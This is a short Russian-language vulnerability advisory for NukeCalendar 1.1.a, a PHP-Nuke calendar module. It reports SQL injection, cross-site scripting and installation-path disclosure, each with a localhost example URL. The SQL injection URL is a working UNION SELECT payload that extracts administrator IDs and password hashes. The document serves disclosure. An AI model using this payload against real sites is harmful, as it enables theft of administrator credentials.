Программа: NukeCalendar 1.1.а
Несколько уязвимостей обнаружено в NukeCalendar. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение. Удаленный пользователь может также определить инсталляционный путь.
1. SQL injection:
http://localhost/nuke71/modules.php?op=modload&name= Kalender&file=index&type=view&eid=-1%20UNION%
20select%20null,aid,null,pwd,null,null,null
2. XSS
http://localhost/nuke71/modules.php?op=modload&name= Kalender&file=index&type=view&eid=[xss code here]
3. Раскрытие инсталляционного пути:
http://localhost/nuke71/modules.php?op=modload&name= Kalender&file=index&type=view&eid=foobar
